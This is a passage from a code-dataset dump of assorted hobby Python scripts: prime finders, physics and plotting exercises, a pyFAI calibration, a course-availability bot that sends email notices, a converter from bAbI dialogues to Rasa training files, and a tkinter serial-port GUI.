gol.append(int(input(f\"How many goals did {player['nome']} score in match {cont}: \")))\n        cont += 1\n\n        if cont == quant + 1:\n            player['gols'] = gol.copy()\n            # COMPUTING THE TOTAL NUMBER OF GOALS\n            total_gols = 0 # reset per player, so totals don't accumulate across players\n            for p in gol:\n                total_gols = total_gols + p\n            player['Total'] = total_gols\n            gol.clear()\n            lista.append(player.copy())\n            break\n    while True:\n        opc = input(\"do you want to continue? [Y/N] \").upper()[0]\n        if opc in \"YN\":\n            break\n        print(\"ERROR! 
TYPE 'Y' OR 'N'\")\n    if opc == \"N\":\n        break\n    else:\n        index += 1\n# pretty-print the collected data\nprint(\"-=\"*30)\nfor y in player.keys():\n    print(f'{y:<13} ', end='')\nprint()\nfor k, v in enumerate(lista):\n    print(f'{k:>3}', end='')\n    for d in v.values():\n        print(f'{str(d):<15}', end=\"\")\n    print()\nprint(\"-=\"*30)\nwhile True:\n    busca = int(input(\"Show data for which player? (type 999 to stop) \"))\n    if busca == 999:\n        break\n    if busca >= len(lista):\n        print(f\"ERROR! there is no player with code {busca}\")\n    else:\n        # fetching items from the dictionary\n        print(f\"-- REPORT FOR PLAYER {lista[busca]['nome']}\")\n        for i, g in enumerate(lista[busca]['gols']):\n            print(f\" In game {i+1} scored {g} goals. \")\n        print('-' *40)\nprint(\"< number: # we can also stop checking here!\n                break # such divisors cannot occur in factorization\n        if number % divisor == 0:\n            isprime = False\n            break # we can stop checking here!\n        if isprime:\n            result.append(number)\n    return result\n\ndef turboNoTime(LIMIT):\n    '''super turbo version'''\n    result = []\n    for number in range(2, LIMIT):\n        isprime = True\n        for divisor in result: # we only have to check for prime numbers!\n            if divisor ** 2 > number: # we can also stop checking here!\n                break # such divisors cannot occur in factorization\n            if number % divisor == 0:\n                isprime = False\n                break # we can stop checking here!\n        if isprime:\n            result.append(number)\n    return result\n\ndef turboRange(bekannte_prims,start,limit,num):\n    '''super turbo version'''\n    result = []\n    for number in range(start, limit):\n        isprime = True\n        for divisor in bekannte_prims: # we only have to check for prime numbers!\n            if divisor ** 2 > number: # we can also stop checking here!\n                break # such divisors cannot occur in factorization\n            if number % divisor == 0:\n                isprime = False\n                break # we can stop checking here!\n        if isprime:\n            bekannte_prims.append(number)\n            result.append(number)\n    return_vals[num] = result\n    return result\n\n\n\n@timed\ndef turboParallel(limit):\n    needed_prims = int(math.ceil(math.sqrt(limit)))\n    bekannte_prims = turboNoTime(needed_prims)\n    start = len(bekannte_prims)\n\n\n    process_count = 10\n    missing_prim_count = start\n    prims_per_process = int(math.floor((limit - missing_prim_count) / process_count))\n\n\n\n    processes=[]\n    for i in range(0,process_count):\n        if i == process_count-1:\n            processes.append(Process(target=turboRange,args = (bekannte_prims, start,int(limit),i)))\n            break\n        processes.append(Process(target=turboRange,args = (bekannte_prims, start,start+prims_per_process,i)))\n        start+=prims_per_process\n\n\n\n    for i in range(0,process_count):\n        processes[i].start()\n\n    for i in range(0,process_count):\n        processes[i].join()\n        bekannte_prims.extend(return_vals[i])\n    return bekannte_prims\n\n\n@timed\ndef sumMethod(n):\n    prim = [2,3]\n    primSum = [0,0];\n    check = 5\n    while check teilbar durch\"+str(prim[primIndex])+\"\\n\")\n                break\n            elif primSum[primIndex] > check:\n                #print(\"->not divisible by\"+str(prim[primIndex]))\n                primIndex+=1\n                continue\n            else:\n                while primSum[primIndex]< check:\n                    primSum[primIndex] += prim[primIndex]\n                    #print(\"PrimSum:\"+str(primSum[primIndex]))\n                    if primSum[primIndex] == check:\n                        break\n                if primSum[primIndex] > check:\n                    #print(\"->not divisible by\"+str(prim[primIndex]))\n                    primIndex+=1\n                    break\n        else:\n            prim.append(check);\n            #print(\"=>prime number\"+\"\\n\")\n            primSum.append(check)\n        check+=1\n    return prim\n\n\nmanager = Manager()\nreturn_vals = manager.dict()\n\n\nlimit = input(\"Enter an upper bound for the prime
eingeben\")\nturboPrallel(limit)\nturbo(limit)\nsumMethod(limit)\n","sub_path":"Python/expert/multiprocessing/primParallel.py","file_name":"primParallel.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"554619825","text":"def numb_increase(): # if there are unless two equal numbers, all numbers will decrease on decreasing numb\n x = int(input('Enter x: '))\n y = int(input('Enter y: '))\n z = int(input('Enter z: '))\n numbers = [x, y, z]\n for i in numbers:\n count = numbers.count(i)\n if count >= 2:\n increasing = int(input('Enter the numb: '))\n numbers = [el + increasing for el in numbers]\n return numbers\n else:\n return 'There is no equal numbers'\n\nprint(numb_increase())\n","sub_path":"numb_increasing.py","file_name":"numb_increasing.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"85260395","text":"\"\"\"\ndef f_to_c(temp_input):\n f_temp = temp_input\n c_temp = (f_temp - 32)* 5/9\n print(c_temp)\n return c_temp #ends your function\n\ntemp_input = int(input(\"What is the temperature in Fahrenheit? \"))\n\nf_to_c(temp_input)\n\ndef c_to_f(temo_input):\n c_temp = temp_input\n f_temp = c_temp*(9/5) + 32\n print(f_temp)\n return f_temp #ends your function\n\ntemp_input = int(input(\"What is the temperature in Celsius? \"))\n\nc_to_f(temp_input)\n\"\"\"\n\n\"\"\"\ntrain_mass = int(input(\"What is the train's mass in kg? \"))\ntrain_acceleration = int(input(\"What is the train's acceleration? \"))\n\"\"\"\n\n\"\"\" \nget_force(train_mass, train_acceleration)\n\"\"\"\n\n\"\"\"\ndef get_energy(mass):\n c = 3*10**8\n bomb_energy = mass * c**2\n print(\"A \" + str(mass) + \"kg bomb supplies \" + str(bomb_energy) + \" Joules.\")\n return bomb_energy\n\nmass = int(input(\"What is the mass of the bomb? \"))\nget_energy(mass)\n\"\"\"\n\ndef get_force():\n train_mass = int(input(\"What is the train's mass in kg? \")) # Inputs make more flexible\n train_acceleration = int(input(\"What is the train's acceleration? \"))\n n_force = train_mass*train_acceleration\n print(\"The GE train supplies \" + str(n_force) + \" Newtons of force.\")\n return n_force\n\ndef get_work():\n n_force = get_force() # Calls the get_force() function to eliminate repetition, assigns to n_force as that function provides the force\n n_distance = int(input(\"What is the distance of travel? 
\"))\n n_work = n_force * n_distance # Calls the global variable - n_force\n print(\"The GE train does \" + str(n_work) + \" Joules of work over \" + str(n_distance) + \" metres.\")\n\nget_work()\n\n","sub_path":"codecademy/Python/code_academy_physics_class.py","file_name":"code_academy_physics_class.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"422524668","text":"\"\"\"This script performs calibration of experiment geometry\"\"\"\n\n\nimport numpy as np\nimport pyFAI\npyFAI.use_opencl = False # It must be set before requesting any OpenCL modules\n\nfrom pyFAI.calibrant import get_calibrant\nfrom pyFAI.geometryRefinement import GeometryRefinement\nimport datetime\n\n\n# Refined gemetry will be saved in this .poni file\nponi_file = \"../../results/intermediate/calibration/Si_17.95keV.poni\"\n\n# Experimental parameters\nwl = 0.6907e-10 # Wavelength in meter\ncal = get_calibrant(\"Si\") # Calibrant used for this experiment\ncal.wavelength = wl\ndet = pyFAI.detectors.Detector(2.53e-5, 2.53e-5) # Pixel size\ndet.max_shape = (2045, 4098) # Detector size in pixels\n\n# Approximate geometry to start with (to be refined by this script)\nd = 1.3e-1 # Distance sample to detector, measured with a ruler\np1 = 2e-3 # Estimated poni1\np2 = 2e-3\nr1 = 0 # rot1\nr2 = 0\nr3 = 0\n\n# Several points on each diffraction ring selected manually from the calibration diffraction image (Si_17.95keV)\np =[]\np.append([854, 21, 0]) # [dim0 (in pixels), dim1, ring index]\np.append([854, 86, 0])\np.append([950, 527, 0])\np.append([1045, 696, 0])\np.append([1217, 902, 0])\np.append([1654, 1155, 0])\np.append([2000, 1206, 0])\np.append([66, 66, 1])\np.append([66, 134, 1])\np.append([70, 186, 1])\np.append([321, 1017, 1])\np.append([499, 1278, 1])\np.append([1110, 1774, 1])\np.append([1193, 1814, 1])\np.append([1519, 1932, 1])\np.append([1837, 1987, 1])\np.append([1926, 1991, 1])\np.append([17, 1250, 2])\np.append([33, 1268, 2])\np.append([123, 1410, 2])\np.append([734, 1994, 2])\np.append([959, 2121, 2])\np.append([1775, 2357, 2])\np.append([1904, 2366, 2])\np.append([246, 2348, 3])\np.append([672, 2616, 3])\np.append([1943, 2943, 3])\np.append([141, 2676, 4])\np.append([712, 2998, 4])\np.append([2018, 3270, 4])\np.append([112, 3290, 5])\np.append([1010, 3666, 5])\np.append([1843, 3800, 5])\np.append([127, 3666, 6])\np.append([707, 3905, 6])\np.append([1431, 4081, 6])\npts = np.array(p, dtype=\"float64\")\n\n\ngeo_ref = GeometryRefinement(data=pts, dist=d, poni1=p1, poni2=p2, rot1=r1, rot2=r2, rot3=r3, detector=det, wavelength=wl, calibrant=cal)\n\n\ngeo_ref.refine2()\n\n\n# generate new .poni file\nwith open(poni_file, \"w\") as poni_f:\n poni_f.write(\"# Calibration done \" + str(datetime.datetime.now()) + \"\\n\")\n poni_f.write(\"PixelSize1: \" + str(geo_ref.pixel1) + \"\\n\")\n poni_f.write(\"PixelSize2: \" + str(geo_ref.pixel2) + \"\\n\")\n poni_f.write(\"Distance: \" + str(geo_ref.dist) + \"\\n\")\n poni_f.write(\"Poni1: \" + str(geo_ref.poni1) + \"\\n\")\n poni_f.write(\"Poni2: \" + str(geo_ref.poni2) + \"\\n\")\n poni_f.write(\"Rot1: \" + str(geo_ref.rot1) + \"\\n\")\n poni_f.write(\"Rot2: \" + str(geo_ref.rot2) + \"\\n\")\n poni_f.write(\"Rot3: \" + str(geo_ref.rot3) + \"\\n\")\n poni_f.write(\"Wavelength: \" + str(geo_ref.wavelength) + 
\"\\n\")\n","sub_path":"src/processing_scripts/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"379554861","text":"\"\"\"\nExample of using a Weibull distribution to represent a RTD, uses function \navailable in the rtd.py module of CpcPy.\n\nCpcPy package available on GitHub at https://github.com/pyrolysis\n\nUpdated 01/27/16 by G.M.W.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as py\nimport cpcpy as cp\n\n# Weibull\n# -----------------------------------------------------------------------------\n\ndef weibull(x, lam, k):\n \"\"\"\n Weibull distribution function.\n \n Parameters\n ----------\n x = time parameter\n k = shape parameter\n lam = lambda as scale parameter\n \n Returns\n -------\n w = weibull distribution\n \"\"\"\n w = (k/lam)*((x/lam)**(k-1))*np.exp(-(x/lam)**k)\n return w\n \n \n# Weibull Distribution\n# -----------------------------------------------------------------------------\n \nx = np.linspace(0, 2.5, 100) # time vector, s\n\nw1 = cp.weibull(x, 1, 0.5) # shape parameter k=1, scale parameter lam=0.5\nw2 = cp.weibull(x, 1, 1) # shape parameter k=1, scale parameter lam=1\nw3 = cp.weibull(x, 1, 1.5) # shape parameter k=1, scale parameter lam=1.5\nw4 = cp.weibull(x, 1, 5) # shape parameter k=1, scale parameter lam=5\n\n# Plot\n# -----------------------------------------------------------------------------\n\npy.close('all')\n\npy.figure(1)\npy.plot(x, w1, lw=2, label='$\\lambda$=1, k=0.5')\npy.plot(x, w2, lw=2, label='$\\lambda$=1, k=1')\npy.plot(x, w3, lw=2, label='$\\lambda$=1, k=1.5')\npy.plot(x, w4, lw=2, label='$\\lambda$=1, k=5')\npy.xlabel('X')\npy.ylabel('Probability density function')\npy.legend(loc='best', numpoints=1)\npy.grid()\n\n","sub_path":"rtd-weibull.py","file_name":"rtd-weibull.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"385281638","text":"import urllib.request as request\nimport urllib.parse as parse\nfrom urllib.error import URLError\nimport time\nfrom email.mime.text import MIMEText\nimport smtplib\n\nclass SearchBot:\n ResultOnConsole = True\n MAXTRY = 3600*24*30*2\n\n def __init__(self,CourseArgs,IncludeList = None, ExclueList = None, RstrList = None, MailInfo: ('sender','Password','receiver') = None,\n gap = 1):\n self._CheckRstr = False\n self._CheckIn = False\n self._CheckEx = False\n self._args = CourseArgs\n assert MailInfo==None or len(MailInfo) == 3\n self._Mail = MailInfo\n self._gap = gap\n if RstrList != None:\n self._CheckRstr = True\n self._Rstr = RstrList\n if IncludeList != None:\n self._CheckIn = True\n self._in = IncludeList\n elif ExclueList != None:\n self._CheckEx = True\n self._ex = ExclueList\n\n\n def _request(self):\n para = parse.urlencode(self._args)\n para = para.encode(\"utf8\")\n htRes = request.Request(\"https://www.reg.uci.edu/perl/WebSoc\", data=para)\n txtRes = request.urlopen(htRes)\n txtRes = txtRes.read().decode(\"utf8\")\n return txtRes\n\n def _encodeMail(self,subject,context):\n res = MIMEText(context)\n res[\"Subject\"] = subject\n res[\"From\"] = self._Mail[0]\n res[\"To\"] = self._Mail[2]\n return res\n\n\n def _sendMail(self,msg):\n ser = smtplib.SMTP(\"smtp.gmail.com\")\n ser.starttls()\n ser.login(self._Mail[0], self._Mail[1])\n ser.send_message(msg)\n ser.quit()\n\n def _RstrCheck(self,line):\n Rstr = line.split('')[13][len(''):]\n if 'and' in 
Rstr:\n            Rstr = Rstr.split(' and ')\n        for i in Rstr:\n            if i in self._Rstr:\n                return False\n\n        return True\n\n\n    def _analyse(self,msg):\n        msg = msg.split('\\n')\n        courses = []\n        for line in msg:\n            # the original tag prefixes were lost from this copy; '<tr' and\n            # '<td' are assumed markers for WebSoc result-table rows\n            if line.lstrip().startswith('<tr') or line.lstrip().startswith('<td'):\n                courses.append(line)\n\n        success = []\n\n        if self._CheckIn:\n            for line in courses:\n                start = line.index('nowrap=\"nowrap\">')\n                courseCode = line[start + len('nowrap=\"nowrap\">'):start + len('nowrap=\"nowrap\">') + 5]\n                if courseCode in self._in:\n                    if 'OPEN' in line:\n                        if not self._CheckRstr or self._RstrCheck(line):\n                            success.append(courseCode)\n        else:\n            for line in courses:\n                start = line.index('nowrap=\"nowrap\">')\n                courseCode = line[start + len('nowrap=\"nowrap\">'):start + len('nowrap=\"nowrap\">') + 5]\n                if courseCode not in self._ex:\n                    if 'OPEN' in line:\n                        if not self._CheckRstr or self._RstrCheck(line):\n                            success.append(courseCode)\n        return success\n\n    def run(self):\n        sendnote = True if self._Mail != None else False\n        lastsent = 0\n        count = 1\n        while True:\n            if self.ResultOnConsole:\n                print(\"Trying to find course for {} time(s)...\".format(count))\n\n            while True:\n                try:\n                    webMsg = self._request()\n                except URLError:\n                    if self.ResultOnConsole:\n                        print(\"Connection Error, Reconnecting...\")\n                    time.sleep(1)\n                else:\n                    break\n\n            Res = self._analyse(webMsg)\n\n            if self.ResultOnConsole:\n                for course in Res:\n                    print('{} is OPEN!!'.format(course))\n\n\n            if len(Res) != 0 and sendnote:\n                if count - lastsent >= 10 * 50 or lastsent == 0:\n                    lastsent = count\n                    msgList = ['{} is OPEN!!'.format(i) for i in Res]\n                    msg = self._encodeMail(\"Your course is available!!\",'\\n'.join(msgList))\n                    self._sendMail(msg)\n\n            count += 1\n            if count>= self.MAXTRY:\n                if self.ResultOnConsole:\n                    print('MAXTRY, BOT STOP')\n                break\n            time.sleep(1)\n\n\n\n\n\n\n\n","sub_path":"SearchBot.py","file_name":"SearchBot.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"299410094","text":"from copy import deepcopy\nimport re\nimport argparse\nimport os.path\nimport json\n\n# NOTE: the named-group identifiers in the regexes below were lost from this\n# copy; the slot names used here (cuisine, price, number, location) are\n# reconstructed assumptions, chosen to match the entity handling further down\nuser_das = {\n    'greet': [\n        '^good morning$',\n        '^hello$',\n        '^hi$'\n    ],\n    'inform': [\n        '^i love (?P<cuisine>\\\\w+) food$',\n        '^(?P<location>\\\\w+) please$',\n        '^i am looking for a (?P<price>\\\\w+) restaurant$', # watchout: not totally sure only price can go there\n        '^(i\\\\'d like to book a table|may i have a table|instead could it be|actually i would prefer|'\n        'can you make a restaurant reservation|can you book a table)?'\n        '(( ?with (?P<cuisine>\\\\w+) (cuisine|food))?( ?in a (?P<price>\\\\w+) price range)?'\n        '( ?for (?P<number>\\\\w+)( people)?)?( ?in (?P<location>\\\\w+))?)+( please)?$',\n        '^we will be (?P<number>\\\\w+)$'\n    ],\n    'deny': [\n        '^no$',\n        '^no this does not work for me$',\n        '^do you have something else$',\n        '^no i don\\\\'t like that$'\n    ],\n    'affirm': [\n        '^it\\\\'s perfect$',\n        '^i love that$',\n        '^let\\\\'s do it$',\n        '^that looks great$'\n    ],\n    'request_phone': [\n        '^may i have the phone number of the restaurant$',\n        '^what is the phone number of the restaurant$',\n        '^do you have its phone number$'\n    ],\n    'request_address': [\n        '^may i have the address of the restaurant$',\n        '^do you have its address$',\n        '^can you provide the address$'\n    ],\n    'thankyou': [\n        '^thanks$',\n        '^thank you$',\n        '^you rock$'\n    ],\n    'bye': [\n        '^no thank you$',\n        '^no thanks$'\n    ],\n    'silence': [\n        '^$'\n    ]\n}\nfor da in user_das:\n    user_das[da] = [re.compile(pattern) for pattern in user_das[da]]\n\n\nbot_das = {\n    'give_phone': [\n        '^here it is \\\\w+phone$'\n    ],\n    'give_address': [\n        
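        # bot utterances in bAbI task 5 are fully templated, so a single\n        # anchored regex per dialog act suffices; the \\w+ chunks only match\n        # the inlined entity (phone/address/restaurant name) and are never\n        # extracted here\n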
'^here it is \\w+address$'\n ],\n 'suggest_restaurant': [\n '^what do you think of this option: \\w+$'\n ],\n 'announce_search': [\n '^ok let me look into some options for you$'\n ],\n 'request_updates': [\n '^sure is there anything else to update$'\n ],\n 'announce_keep_searching': [\n '^sure let me find an other option for you$'\n ],\n 'api_call': [\n '^api_call \\w+ \\w+ \\w+ \\w+$'\n ],\n 'reserve': [\n '^great let me do the reservation$'\n ],\n 'greet': [\n '^hello what can i help you with today$'\n ],\n 'on_it': [\n '^i\\'m on it$'\n ],\n 'ask_location': [\n '^where should it be$'\n ],\n 'ask_number_of_people': [\n '^how many people would be in your party$'\n ],\n 'ask_price': [\n '^which price range are looking for$'\n ],\n 'ask_cuisine': [\n '^any preference on a type of cuisine$'\n ],\n 'ask_anything_else': [\n '^is there anything i can help you with$'\n ],\n 'bye': [\n '^you\\'re welcome$'\n ]\n}\n\n\nfor da in bot_das:\n bot_das[da] = [re.compile(pattern) for pattern in bot_das[da]]\n\n\ndef get_user_act(text):\n \"\"\"\n Determines the dialog act of a bAbI t5 user utterance\n :param text: user utterance\n :return: da of the utterance (str) or None if no match found\n \"\"\"\n for act in user_das:\n for pattern in user_das[act]:\n match = pattern.search(text)\n if match:\n return act, [{\"start\": match.span(ent)[0], \"end\": match.span(ent)[1], \"value\": val, \"entity\": ent}\n for ent, val in match.groupdict().items() if val]\n return None\n\n\ndef get_bot_act(text):\n \"\"\"\n Determines the dialog act of a bAbI t5 bot utterance\n :param text: bot utterance\n :return: da of the utterance (str) or None if no match found\n \"\"\"\n for act in bot_das:\n for pattern in bot_das[act]:\n if pattern.search(text):\n return act\n return None\n\n\ndef babi_dialogue_iterator(babi_filename):\n \"\"\"\n Generator for bAbI stories. 
Skips api call results\n :param babi_filename: bAbI file name\n :return: list of message exchanges, as dictionaries with 'human', 'bot' pairs\n \"\"\"\n story = []\n with open(babi_filename, 'r') as babi_file:\n for line in babi_file:\n if line == '\\n': # end of story\n _story = deepcopy(story)\n story = []\n yield _story\n chunks = line.split('\\t')\n chunks[0] = ' '.join(chunks[0].split(' ')[1:]) # rid of initial number\n if len(chunks) == 1: # api call results, garbage\n continue\n elif len(chunks) == 2: # normal line\n human, bot = chunks\n story.append({'human': human, 'bot': bot[:-1]}) # removing final \\n\n else:\n raise Exception('Unknown formatted line: {}'.format(line))\n\n\ndef produce_nlu_training_file(input_filename, output_filename):\n result = {\"rasa_nlu_data\": {\"common_examples\": [], \"entity_examples\": [], \"intent_examples\": []}}\n for story in babi_dialogue_iterator(input_filename):\n for turn in story:\n text = turn['human']\n intent, entities = get_user_act(text)\n result[\"rasa_nlu_data\"][\"common_examples\"].append({\"text\": text, \"intent\": intent, \"entities\": entities})\n with open(output_filename, 'w') as output_fh:\n json.dump(result, output_fh, indent=2)\n\n\ndef rasafy(intent, entities):\n if entities:\n return intent + '{' + ', '.join(['\"{}\": \"{}\"'.format(e['entity'], e['value']) for e in entities]) + '}'\n else:\n return intent\n\n\ndef produce_dialog_training_file(input_filename, output_filename, action_prefixes=None):\n action_prefixes = {action: '' for action in bot_das} if not action_prefixes else action_prefixes\n with open(output_filename, 'w') as output_fh:\n for i, story in enumerate(babi_dialogue_iterator(input_filename)):\n output_fh.write('## {}'.format(i) + '\\n')\n for turn in story:\n intent, entities = get_user_act(turn['human'])\n bot_says = get_bot_act(turn['bot'])\n output_fh.write('* ' + rasafy(intent, entities) + '\\n')\n output_fh.write(' - ' + action_prefixes[bot_says] + bot_says + '\\n')\n output_fh.write('\\n')\n\n\ndef _basic_checks(args):\n if args.task not in ['nlu', 'dialog']:\n raise ValueError('invalid value for argument task: {}\\nMust be either nlu or dialog'.format(args.task))\n if not args.input:\n raise Exception('argument --input is mandatory')\n if not os.path.isfile(args.input):\n raise FileNotFoundError('file {} does not exist'.format(args.input))\n if not args.output:\n raise Exception('argument --output is mandatory')\n return args\n\n\ndef _get_args():\n parser = argparse.ArgumentParser(\n description='produce Rasa format training files')\n parser.add_argument(\n 'task',\n choices=[\"nlu\", \"dialog\"],\n help=\"nlu: produce nlu training file\\ndialog: produce keras policy training file\")\n parser.add_argument('--input', type=str, help='input file name')\n parser.add_argument('--output', type=str, help='output file name')\n parser.add_argument('--utter-prefixes', action='store_true', default=False)\n return _basic_checks(parser.parse_args())\n\n\nif __name__ == '__main__':\n args = _get_args()\n if args.task == \"nlu\":\n produce_nlu_training_file(args.input, args.output)\n elif args.task == \"dialog\":\n prefixes = {action: 'utter_' for action in bot_das} if args.utter_prefixes else None\n produce_dialog_training_file(args.input, args.output, prefixes)\n","sub_path":"babit5/data/babi_reader.py","file_name":"babi_reader.py","file_ext":"py","file_size_in_byte":7570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"5909790","text":"# 
coding:UTF-8\r\n\r\nimport tkinter\r\nfrom tkinter import ttk, filedialog, messagebox, scrolledtext\r\nfrom tkinter import *\r\nimport openpyxl\r\nimport threading\r\nimport time\r\nimport serial\r\nimport re # regular expressions, can match arbitrary fields\r\nimport serial.tools.list_ports # call this tool directly to get the serial port names\r\n#from code_dic import MY_CODE\r\n\r\n\r\nclass MY_GUI():\r\n\r\n # constructor\r\n def __init__(self, name):\r\n self.init_window_name = name\r\n\r\n # initialize the window widgets\r\n def set_init_window(self): # widget setup happens mainly in this function; it is simple to use, mostly creating widgets and setting their parameters\r\n self.init_window_name.title('Serial Port Control')\r\n self.init_window_name.geometry('1168x631+20+10')\r\n self.init_window_name['bg'] = 'pink'\r\n self.init_window_name.attributes('-alpha', 1)\r\n # every widget must be positioned with the pack, place or grid layout manager, i.e. once a widget is created you decide where to place it.\r\n # buttons\r\n self.file_choose_button = Button(self.init_window_name, text='Choose File', bg='lightblue', width=10,\r\n command=self.thread_file)\r\n self.file_choose_button.place(x=40, y=170) # place layout: x and y are the pixel offsets from the top-left corner of the parent window\r\n self.conduct_button = Button(self.init_window_name, text='Run', bg='lightblue', width=10,\r\n command=self.com_output)\r\n self.conduct_button.place(x=40, y=455)\r\n self.log_save_button = Button(self.init_window_name, text='Save Log', bg='lightblue', width=10,\r\n command=self.thread_save)\r\n self.log_save_button.place(x=335, y=455)\r\n self.clear_button = Button(self.init_window_name, text='Clear', bg='lightblue', width=10,\r\n command=self.thread_clear)\r\n self.clear_button.place(x=460, y=455)\r\n # a button's command parameter must point to a callable; each one runs in its own thread here so the buttons do not interfere with each other\r\n # serial-port selection frame\r\n self.com_choose_frame = Frame(self.init_window_name)\r\n self.com_choose_frame.place(x=20, y=12)\r\n # a frame holds several widgets and gives the layout a clearer hierarchy\r\n # labels inside the selection frame; label values usually do not change\r\n self.com_label = Label(self.com_choose_frame, text='COMx: ')\r\n self.com_label.grid(row=0, column=0, sticky=E)\r\n self.baudrate_label = Label(self.com_choose_frame, text='Baudrate: ')\r\n self.baudrate_label.grid(row=1, column=0, sticky=E, pady=10)\r\n # drop-down combobox inside the serial-port frame\r\n self.com_choose = StringVar()\r\n self.com_choose_combo = ttk.Combobox(self.com_choose_frame, width=30, textvariable=self.com_choose)\r\n self.com_choose_combo['state'] = 'readonly'\r\n self.com_choose_combo.grid(row=0, column=1, padx=15) # grid is a table layout, rows and columns start at 0; padx is the horizontal gap between the two columns\r\n self.com_choose_combo['values'] = self.com_name_get() # calls a function whose return value is a list\r\n # the combobox shows all options when dropped down and only the selected one afterwards\r\n # baud-rate combobox\r\n self.baudrate_value = StringVar(value='9600') # StringVar is a string variable widget\r\n self.baudrate_choose_combo = ttk.Combobox(self.com_choose_frame, width=30, textvariable=self.baudrate_value)\r\n # the value selected in the combobox is assigned to the string variable and displayed on the combobox\r\n self.baudrate_choose_combo['values'] = ('9600', '115200')\r\n self.baudrate_choose_combo['state'] = 'readonly'\r\n self.baudrate_choose_combo.grid(row=1, column=1, padx=15)\r\n # buttons inside the serial-port frame\r\n self.connect_button = Button(self.com_choose_frame, text='Connect', bg='lightblue', width=10,\r\n command=self.com_connect)\r\n self.connect_button.grid(row=0, column=2, padx=15)\r\n self.cancel_button = Button(self.com_choose_frame, text='Cancel', bg='lightblue', width=10, command=self.com_cancel)\r\n self.cancel_button.grid(row=1, column=2, padx=15)\r\n\r\n # scrolled text box for displaying results\r\n self.result_text = scrolledtext.ScrolledText(self.init_window_name, width=77, height=42)\r\n self.result_text.place(x=600, y=50)\r\n # ScrolledText is a small wrapper shipped with tkinter that combines a Text widget with a Scrollbar and can be used directly\r\n # other text boxes\r\n self.file_path_text = Text(self.init_window_name, width=57, height=1)\r\n self.file_path_text.place(x=150, y=175)\r\n self.com_log_text = Text(self.com_choose_frame, width=78, height=5)\r\n 
self.com_log_text.grid(row=2, column=0, columnspan=3, pady=5)\r\n self.com_log_text.insert(END, 'serial port status messages are shown here' + '\\n') # this line assigns the initial value\r\n\r\n # labels\r\n self.result_data_label = Label(self.init_window_name, text='Output')\r\n self.result_data_label.place(x=600, y=15)\r\n self.num_input_label = Label(self.init_window_name, text='Enter ID: ')\r\n self.num_input_label.place(x=150, y=460)\r\n\r\n # ID entry box\r\n self.input_num = StringVar()\r\n self.input_num_entry = Entry(self.init_window_name, textvariable=self.input_num, width=10)\r\n self.input_num_entry.place(x=215, y=460)\r\n\r\n # display the code after it has been parsed\r\n self.code_frame = Frame(self.init_window_name, width=78, height=29, bg='white')\r\n self.code_frame.place(x=20, y=210)\r\n # the parsed code is shown in a table\r\n self.code_tree = ttk.Treeview(self.code_frame, show='headings', height=10, columns=('0', '1', '2', '3', '4'))\r\n # show='headings' hides the first column, which would otherwise be too wide\r\n self.code_bar = ttk.Scrollbar(self.code_frame, orient=VERTICAL, command=self.code_tree.yview)\r\n self.code_tree.configure(yscrollcommand=self.code_bar.set)\r\n self.code_tree.grid(row=0, column=0, sticky=NSEW)\r\n self.code_bar.grid(row=0, column=1, sticky=NS)\r\n self.code_tree.column('0', width=30)\r\n self.code_tree.column('1', width=250)\r\n self.code_tree.column('2', width=50)\r\n self.code_tree.column('3', width=100)\r\n self.code_tree.column('4', width=100)\r\n self.code_tree.heading('0', text='No.')\r\n self.code_tree.heading('1', text='Command')\r\n self.code_tree.heading('2', text='Status')\r\n self.code_tree.heading('3', text='Retries on failure')\r\n self.code_tree.heading('4', text='On repeated failure jump to')\r\n\r\n # frame for displaying execution results\r\n self.result_frame = Frame(self.init_window_name, width=78, height=15, bg='white')\r\n self.result_frame.place(x=20, y=500)\r\n self.result_tree = ttk.Treeview(self.result_frame, show='headings', height=4, columns=('0', '1', '2'))\r\n self.result_bar = ttk.Scrollbar(self.result_frame, orient=VERTICAL, command=self.result_tree.yview)\r\n self.result_tree.configure(yscrollcommand=self.result_bar.set)\r\n self.result_tree.grid(row=0, column=0, sticky=NSEW)\r\n self.result_bar.grid(row=0, column=1, sticky=NS)\r\n self.result_tree.column('0', width=30)\r\n self.result_tree.column('1', width=80)\r\n self.result_tree.column('2', width=420)\r\n self.result_tree.heading('0', text='ID')\r\n self.result_tree.heading('1', text='Success')\r\n self.result_tree.heading('2', text='First failing command')\r\n\r\n # automatically get the names of the currently connected serial ports\r\n def com_name_get(self):\r\n self.port_list = list(serial.tools.list_ports.comports())\r\n self.com_port_names = []\r\n self.pattern = re.compile(r'[(](.*?)[)]', re.S)\r\n if len(self.port_list) > 0:\r\n for i in range(len(self.port_list)):\r\n self.com_name = re.findall(self.pattern, str(self.port_list[i]))\r\n self.com_port_names.append(self.com_name)\r\n return self.com_port_names\r\n\r\n # handler for the Connect button\r\n def com_connect(self):\r\n self.result_text.insert(END, 'please connect a serial device' + '\\n')\r\n self.ser_name = str(self.com_choose.get())\r\n self.ser_baudrate = str(self.baudrate_value.get())\r\n try:\r\n self.ser = serial.Serial(self.ser_name)\r\n self.ser.baudrate = self.ser_baudrate\r\n self.ser.timeout = 0.5\r\n self.com_log_text.insert(END, time.ctime(time.time()) + '\\t\\t' + 'serial port opened successfully' + '\\n')\r\n self.com_log_text.see(tkinter.END)\r\n self.com_log_text.update()\r\n while True:\r\n newline = self.ser.readline() # bytes type\r\n self.result_text.insert(END, newline)\r\n self.result_text.see(tkinter.END)\r\n self.result_text.update()\r\n except:\r\n newline = time.ctime(time.time()) + '\\t\\t' + 'failed to open serial port, or the port was closed' + 